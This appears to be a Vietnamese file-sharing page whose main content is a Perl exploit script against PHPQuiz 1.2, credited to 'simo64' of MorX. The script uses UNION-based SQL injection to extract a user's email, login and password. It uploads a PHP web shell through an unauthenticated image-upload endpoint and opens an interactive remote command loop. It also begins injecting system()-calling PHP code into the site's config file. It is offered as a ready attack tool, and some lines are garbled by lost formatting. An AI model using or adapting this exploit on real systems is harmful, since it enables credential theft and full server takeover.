Hacker Professional part 419

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:5

Thêm vào BST

Báo xấu

40
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 419', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Hacker Professional part 419

black_hat_cr(HCE) HPQuiz 1.2 Remote SQL injection/Code Execution Exploit Code: #!/usr/bin/perl use IO::Socket ; use LWP::Simple ; print q( /-----------------------------------------------------------\ | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit | | Coded by simo64 - simo64_morx.org | | www.morx.org | |-----------------------------------------------------------| | MorX Security Research Team © | \-----------------------------------------------------------/ ); sub usage(){ print "\nUsage :perl $0 siteurl /path/ userid\n"; print "\nExemple : perl $0 phpquiz.com /phpquiz/ 1\n"; } if(!@ARGV){ &usage(); exit(0) } $host = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2];
$success = null ; $injected = 0; $injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou"; $phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;ec ho%20\@\$xD;\@system(\$morx);//MorX%20RulZ%20=)"; $injectuser = "front/?what=score&univers=- 64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null %20FROM%20user%20WHERE%20ID=$uid/*"; $injectpass = "front/?what=score&univers=- 64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%2 0FROM%20user%20WHERE%20ID=$uid/*"; $injectmail = "front/?what=score&univers=- 64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null %20FROM%20user%20WHERE%20ID=$uid/*"; syswrite STDOUT , "Connecting to $host ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n\nUnable to connect to $host " unless($sock) ; syswrite STDOUT , "\tConnected !\n\n\[+] Injecting credentials\n\nSending Data ..."; print $sock "GET $path$injectmail HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Connection: Close\n\n"; while($res = ){ if($res =~ /anim_fleche_droite.gif" border="0"> "(.*?)"/){ $usermail = $1 ; $success = "ok" ; } }
if($success eq "ok") { syswrite STDOUT , "\n\nSQL injection Succeded !\n\n"; sleep 2 ; syswrite STDOUT , "\tUser EMail : $usermail\n"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $path$injectuser HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Connection: Close\n\n"; while($res = ){ if($res =~ /> "(.*?)"/){ $userlogin = $1 ; } } syswrite STDOUT , "\tUser Login : $userlogin\n"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $path$injectpass HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Connection: Close\n\n"; while($res = ){ if($res =~ /> "(.*?)"/){ $userpass = $1 ; } } syswrite STDOUT , "\tUser Passwd : $userpass\n\n"; } else {print "\n\nInjecting credentials Exploit Failed !\n\n";} sleep 2;
# PART2 Remote Command Execution by uploaing shell syswrite STDOUT , "\n[+] Exec CMD by uploading a shell"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n\nUnable to connect to $host " unless($sock) ; syswrite STDOUT , "\tConnected !\n\n"; syswrite STDOUT , "Uploading shell ..."; $data='-----------------------------7d61592213049c Content-Disposition: form-data; name="dir" / -----------------------------7d61592213049c Content-Disposition: form-data; name="image"; filename="zaz.php" Content-Type: text/plain -----------------------------7d61592213049c Content-Disposition: form-data; name="submit" Upload -----------------------------7d61592213049c-- '; $script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/zaz.p hp"; $len = length $data ; print $sock "POST $script HTTP/1.0\r\n";
print $sock "Content-Type: multipart/form-data; boundary=-------------------------- -7d61592213049c\r\n"; print $sock "Host: $host\r\n"; print $sock "Content-Length: $len\r\n"; print $sock "Connection: close\r\n\r\n"; print $sock $data; syswrite STDOUT , "\t[OK]\n\nChecking if successfully Uploaded .... "; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0\r\n"; print $sock "Host: $host\r\n"; print $sock "Connection: close\n\n"; while($rep = ){ if($rep =~ /HTTP\/1.1 200 OK/) { $success = 1; } } if($success == 1){ print "\t[OK]\n\n\t\tNOW YOU CAN LAUNCH COMMANDS\n\n"; while(){ print "simo64[at]morx.org :~\$ "; chop($cmd=); exit() if ($cmd eq 'exit'); $result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd"); print $result; } } else { print "\tFailed !\n\nFile Upload Failed\n\n" } # STEP 3 Injecting PHPcode into config.inc.php file print "\n[+] Injecting PHP Code......\n\nConnecting ....";